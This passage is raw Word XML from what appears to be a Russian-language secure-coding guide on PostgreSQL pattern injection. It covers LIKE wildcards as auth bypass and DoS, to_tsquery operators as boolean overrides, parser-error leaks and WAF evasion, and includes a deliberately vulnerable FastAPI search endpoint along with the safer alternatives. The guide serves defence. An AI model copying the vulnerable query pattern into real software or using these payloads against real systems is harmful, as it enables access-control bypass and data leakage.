        <w:t xml:space="preserve"> всегда true) или вызвать syntax error → error-based extraction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mini-таблица: пять подразделов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Точка входа</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Семантика</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Канал атаки</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Защита</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LIKE :search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wildcards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_</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bypass auth/access, info leak, DoS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ESCAPE \</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replace('%','\\%')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to_tsquery(:search)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operators </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> `</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 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;-&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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boolean override, syntax-error info-leak</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plainto_/websearch_to_tsquery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safe alternatives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атаки — pattern защиты)</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migration pattern</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`to_tsquery(... \</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parser-error канал</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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via CAST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.15.4 использует тот же error-канал (PostgreSQL parser errors leak input), но source —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-syntax-error, а не CAST-error. Граница: 3.2 описывает CAST-канал; 3.15.4 — tsquery-syntax-канал.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3.15.1 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIKE '%' OR ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) и 3.15.2 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_tsquery('term &amp; true')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) создают boolean-каналы внутри pattern/tsquery. Граница: 3.3 описывает boolean-канал в общем; 3.15 — конкретные точки входа.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Обход фильтров</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — pattern в LIKE/tsquery часто используется как обход WAF, который смотрит на буквальные кавычки и keywords, но не понимает pattern-семантику. Граница: 3.9 — общие техники filter bypass; 3.15 — конкретные семантические поверхности.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3.14.4 ORDER BY (CASE WHEN)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — boolean-канал тот же тип (sort meet content); 3.15.1 boolean через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параллельный класс точек входа.</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3.15.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> % и _ в LIKE без ESCAPE — wildcards как auth-bypass + DoS через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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3.15.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to_tsquery operators — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp; | ! &lt;-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как boolean-override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3.15.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> websearch_to_tsquery / plainto_tsquery — безопасные альтернативы + migration pattern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3.15.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tsquery как error-based канал — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_tsquery(... || :input)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → leaked в parser error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Общая модель угроз</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Корень проблемы — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">mismatch между namespace ввода и namespace интерпретации</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LIKE-pattern namespace</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языковая аннотация</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> внутри SQL-string. Bind-параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE name LIKE :search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> передаёт строку без SQL-escaping (нет injection кавычек), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">значение строки</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 что для движка тождественно «оператор wildcards». Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не bug PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, это semantics SQL92.</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tsquery namespace</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полный operator-язык</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> внутри текстовой строки. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_tsquery('admin &amp; superuser')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> парсит строку как AST: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin AND superuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Любой ввод от пользователя в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запуск парсера полного языка</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eval()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в Python.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Принципиальная разница с обычной SQL-инъекцией: даже </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">правильная bind-параметризация не защищает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bind подставляет значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">в строку</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но movement-семантика внутри строки уже находится </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">под контролем атакующего</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Защита требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">либо escape pattern-символов на стороне приложения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, либо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">переход на функцию, которая не парсит operators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класс паттернов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не CVE — все подразделы 3.15 описывают standard SQL/PG features, используемые неправильно.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.15.1 % и _ в LIKE без ESCAPE</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LIKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PostgreSQL — pattern matching с двумя wildcards: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(zero-or-more characters) и </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(any single character). Когда приложение принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от пользователя и подставляет в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE name LIKE :search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через bind-параметр — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL-injection физически невозможна</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (bind защищает от quote-escape), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pattern-semantics остаётся под контролем атакующего</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Payload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парсится как «всё, что содержит admin». Если приложение использует LIKE для проверки доступа (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE owner LIKE :session_user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), payload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матчит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">все строки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — auth bypass. Дополнительно: множественные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длинном pattern на индексированной таблице создают DoS через quadratic match (PostgreSQL backtracking matcher).</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app/api/v1/documents.py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Query,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@router.get("/documents/search")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search_documents(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query(""),</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Bind-параметр защищает от SQL-injection, но не от pattern-attack</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title, owner_id, created_at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM documents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE title ILIKE :pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 100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{"pattern": f"%{q}%"})</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pattern = f"%{q}%"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — приложение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">само</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
